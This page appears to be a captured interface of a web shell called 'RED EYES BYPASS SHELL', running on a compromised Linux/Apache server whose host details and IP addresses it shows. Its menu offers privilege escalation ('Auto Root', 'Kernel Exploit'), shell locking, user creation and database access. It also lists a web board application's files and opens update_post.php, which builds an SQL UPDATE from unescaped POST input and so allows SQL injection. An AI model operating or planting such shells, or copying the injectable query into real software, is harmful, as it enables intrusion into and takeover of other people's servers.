Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
bord /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
css
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
sql
[ DIR ]
drwxr-xr-x
README.md
7.4
KB
-rwxr-xr-x
del_post.php
567
B
-rwxr-xr-x
del_view.php
617
B
-rwxr-xr-x
edit_post.php
557
B
-rwxr-xr-x
index.php
5.48
KB
-rwxr-xr-x
login.php
1.42
KB
-rwxr-xr-x
logout.php
294
B
-rwxr-xr-x
post.php
8.18
KB
-rwxr-xr-x
update_post.php
1.68
KB
-rwxr-xr-x
view.php
10.83
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update_post.php
<?php session_start(); if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (!isset($_POST['title'], $_POST['description'], $_POST['name'])) { header('Location: index.php'); exit; } $DATA = $_POST; foreach ($DATA as $key => $value) { $DATA[$key] = trim($value); } if ($DATA['title'] === '') { $FORM_ERRORS['title'] = "กรุณาระบุ 'หัวข้อ'"; } elseif (mb_strlen($DATA['title'], 'UTF-8') > 255) { $FORM_ERRORS['title'] = "'หัวข้อ' ต้องมีความยาวไม่เกิน 255 ตัวอักษร"; } if ($DATA['description'] === '') { $FORM_ERRORS['description'] = "กรุณาระบุ 'รายละเอียด'"; } elseif (mb_strlen($DATA['description'], 'UTF-8') > 65535) { $FORM_ERRORS['description'] = "'รายละเอียด' ต้องมีความยาวไม่เกิน 65535 ตัวอักษร"; } if ($DATA['name'] === '') { $FORM_ERRORS['name'] = "กรุณาระบุ 'ชื่อ'"; } elseif (mb_strlen($DATA['name'], 'UTF-8') > 64) { $FORM_ERRORS['name'] = "'ชื่อ' ต้องมีความยาวไม่เกิน 64 ตัวอักษร"; } if (!isset($FORM_ERRORS)) { require 'inc/mysqli.inc.php'; $sql = "UPDATE topic SET last_commented = NOW() , title = '".$DATA['title']."', description = '".$DATA['description']."', name = '".$DATA['name']."' ,ip = '".$_SERVER['REMOTE_ADDR']."' WHERE id='".$DATA['id']."' "; $mysqli->query($sql); header('Location: index.php'); exit; } } ?>
Close